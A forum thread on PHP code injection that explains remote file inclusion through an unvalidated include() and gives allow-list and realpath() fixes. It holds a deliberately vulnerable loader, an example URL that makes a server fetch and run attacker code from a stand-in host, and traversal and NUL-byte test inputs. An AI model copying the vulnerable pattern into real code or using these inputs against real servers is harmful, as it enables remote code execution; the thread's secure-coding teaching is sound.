PHP Injection

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.


fambi
Forum Newbie
Posts: 18
Joined: Sun Apr 02, 2006 12:12 am

PHP Injection

Post by fambi »

Hi everyone,

I'm new to the forum and thank you all for providing this security forum.

I can appreciate the idea of some malicious user injecting script into my html, or modifying my sql's with an sql injection, but is it possible for someone to inject php code using an unfiltered textarea (for example)?

Thanks.
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

Possible, yes, but for your scripts to actually run that, you'd need some very specific code. eval() would have to be used, most likely. Although if you save data into a file and can be tricked into loading that file, that will do it too.
fambi
Forum Newbie
Posts: 18
Joined: Sun Apr 02, 2006 12:12 am

Post by fambi »

Thanks feyd.

(To keep threads on topic, I've begun another thread over at viewtopic.php?p=251801#251801 - your help over there would also be appreciated.)
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Post by Maugrim_The_Reaper »

If allow_url_fopen is enabled in your php.ini configuration, include() and require() calls can also accept a URL to the file to include. If this is possible, allowing an unfiltered/unvalidated variable to be prepended to an include path can result in an attacker exploiting this remote capability to point the include request to a remote file they themselves have written. This is even more dangerous if they know enough information to be capable of accurately guessing your webroot and lower directory paths.

Simple example:

You create an application file which loads a database connection. You also include a file (perhaps as part of a simple front controller).


// load database connection

if(isset($_GET['page']) && !empty($_GET['page'])) {
	include($_GET['page'] . '.inc');
} else {
	include('index.inc');
}

exit;

Now the attacker could simply store a PHP file called "evil.inc" at http://example.com/evil.inc and call the request (to your script):

http://www.yourserver.com/index.php?pag ... m/evil.inc

Result?

Your include() will use the "page" GET variable, fetch and parse the evil.inc script, and execute it. If they know your application well enough (error messages are a huge help there) they can manage to do a lot - basically anything YOU could do from PHP on your server.

Fix?

Check all user variables.


// load database connection

$clean = array(); // store filtered variables separately

// filter, filter, filter - check all characters are alphabetical (no colons, slashes, periods...)
if(isset($_GET['page']) && !empty($_GET['page']) && ctype_alpha($_GET['page'])) {
	$clean['page'] = $_GET['page'];
} else {
	$clean['page'] = 'index';
}

if($clean['page']) include($clean['page'] . '.inc');

exit;

The solution here is to only allow alphabetic characters in the values - rejecting slash/period/colon characters means no URL will be accepted to taint our script...
fambi
Forum Newbie
Posts: 18
Joined: Sun Apr 02, 2006 12:12 am

Post by fambi »

Thanks for the input.
timvw
DevNet Master
Posts: 4897
Joined: Mon Jan 19, 2004 11:11 pm
Location: Leuven, Belgium

Post by timvw »

- I usually build up a $filelocation that contains the page location.
- Then I check if the file exists and if it's readable.
- Then I check if the realpath of the location is a subpath of my $base_path (avoids most of the ../ tricks).
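
Putting Maugrim_The_Reaper's allow-list filter and timvw's three checks together in one page loader, as an added example that is not code from any post in this thread. It assumes a directory of "<name>.inc" page files under a base path and page names made of letters only; the base directory and its two sample pages are constructed by the script itself so it runs stand-alone and cleans up afterwards.

```php
<?php
// Added example (not from the thread): a hardened front-controller page
// loader. Step 1 is the ctype_alpha() allow-list from the post above;
// steps 2 and 3 are the exists/readable and realpath() containment checks
// timvw describes. Assumption: pages live as "<letters>.inc" in $basePath.

declare(strict_types=1);

function resolvePage(string $basePath, string $page): ?string
{
    // 1. Allow-list the raw value before it touches the filesystem.
    //    ctype_alpha() rejects '.', '/', ':' and NUL, so neither
    //    "http://example.com/evil" nor "../../etc/passwd" gets past here.
    if ($page === '' || !ctype_alpha($page)) {
        return null;
    }

    $candidate = $basePath . DIRECTORY_SEPARATOR . $page . '.inc';

    // 2. The target must be a regular file that this process can read.
    if (!is_file($candidate) || !is_readable($candidate)) {
        return null;
    }

    // 3. Resolve symlinks and ".." segments, then require the result to sit
    //    inside $basePath. The trailing separator in the comparison stops a
    //    sibling such as "/var/www/pages-evil" from matching "/var/www/pages".
    $realBase = realpath($basePath);
    $realFile = realpath($candidate);
    if ($realBase === false || $realFile === false) {
        return null;
    }
    if (strpos($realFile, $realBase . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }

    return $realFile;
}

// --- constructed fixture: a temporary base directory with two pages -------
$basePath = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($basePath, 0700);
file_put_contents($basePath . '/index.inc', "<?php echo \"index page\\n\";\n");
file_put_contents($basePath . '/about.inc', "<?php echo \"about page\\n\";\n");

// Constructed sample requests, the kind of values $_GET['page'] might carry.
$inputs = [
    'index',                     // legitimate
    'about',                     // legitimate
    'http://example.com/evil',   // remote include attempt: fails ctype_alpha
    '../../../../etc/passwd',    // traversal attempt: fails ctype_alpha
    "index\0",                   // NUL-byte trick: fails ctype_alpha
    'missing',                   // passes the allow-list but no such file
];

foreach ($inputs as $input) {
    // Fall back to the index page when the request is rejected, as the
    // fixed code in the thread does.
    $file = resolvePage($basePath, $input) ?? resolvePage($basePath, 'index');
    printf("%-30s -> %s\n", json_encode($input), basename($file));
    include $file;
}

// --- clean up the fixture --------------------------------------------------
foreach (glob($basePath . '/*.inc') as $f) {
    unlink($f);
}
rmdir($basePath);
```

The order matters: the allow-list runs first so hostile strings never reach a filesystem call, and the realpath() comparison is kept anyway as defence in depth, because a later change that loosens the allow-list (say, to permit digits or underscores) would otherwise silently reopen traversal. Remember that realpath() returns false for URLs and for files that do not exist, so both branches of the `false` check are needed.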
fambi
Forum Newbie
Posts: 18
Joined: Sun Apr 02, 2006 12:12 am

Post by fambi »

Thanks.